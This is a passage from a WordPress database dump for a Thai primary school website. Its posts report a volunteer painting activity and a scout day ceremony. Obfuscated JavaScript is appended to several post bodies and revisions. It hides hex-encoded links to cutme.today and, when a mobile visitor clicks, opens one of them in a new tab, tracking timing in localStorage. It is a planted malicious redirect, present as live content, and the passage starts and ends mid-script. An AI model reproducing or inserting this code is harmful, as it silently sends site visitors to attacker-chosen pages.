_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารข่าวประชาสัมพันธ์ \"จิตอาสา พัฒนาเพื่อน้อง\"','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98','','','2024-08-01 20:57:16','2024-08-01 13:57:16','',0,'http://pakhaeng.ssk.in.th/?p=447',0,'post','',0),
(448,1,'2024-08-01 20:57:02','2024-08-01 13:57:02','','26-67','','inherit','','closed','','26-67','','','2024-08-01 20:57:02','2024-08-01 13:57:02','',447,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/26-67.png',0,'attachment','image/png',0),
(449,1,'2024-08-01 20:57:14','2024-08-01 13:57:14','<!-- wp:paragraph -->\n<p><strong>วันที่ 29 มิถุนายน พ.ศ. 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ให้การต้อนรับนักเรียนโรงเรียนกันทรลักษ์วิทยา ที่มาจัด กิจกรรมเพื่อพัฒนาโรงเรียน พร้อมด้วยนักเรียน ชั้น ป.6 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกันทำความสะอาด ทาสี และวาดภาพ ทางโรงเรียนฯ ขอขอบคุณนักเรียนจากโรงเรียนกันทรลักษ์วิทยา ที่มาจัดกิจกรรมดี ๆ เพื่อน้อง ๆ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มา ณ ในโอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/26-67-724x1024.png\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารข่าวประชาสัมพันธ์ \"จิตอาสา พัฒนาเพื่อน้อง\"','','inherit','closed','closed','','447-revision-v1','','','2024-08-01 20:57:14','2024-08-01 13:57:14','',447,'http://pakhaeng.ssk.in.th/?p=449',0,'revision','',0),
(450,1,'2024-08-01 20:58:31','2024-08-01 13:58:31','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่โดย มีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":451,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/27-67-724x1024.png\" alt=\"\" class=\"wp-image-451\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ “กิจกรรมวันสถาปนาลูกเสือแห่งชาติ”','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%81%e0%b8%b4','','','2024-08-01 20:58:33','2024-08-01 13:58:33','',0,'http://pakhaeng.ssk.in.th/?p=450',0,'post','',0),
(451,1,'2024-08-01 20:58:11','2024-08-01 13:58:11','','27-67','','inherit','','closed','','27-67','','','2024-08-01 20:58:11','2024-08-01 13:58:11','',450,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/27-67.png',0,'attachment','image/png',0),
(452,1,'2024-08-01 20:58:31','2024-08-01 13:58:31','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่โดย มีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":451,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/27-67-724x1024.png\" alt=\"\" class=\"wp-image-451\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 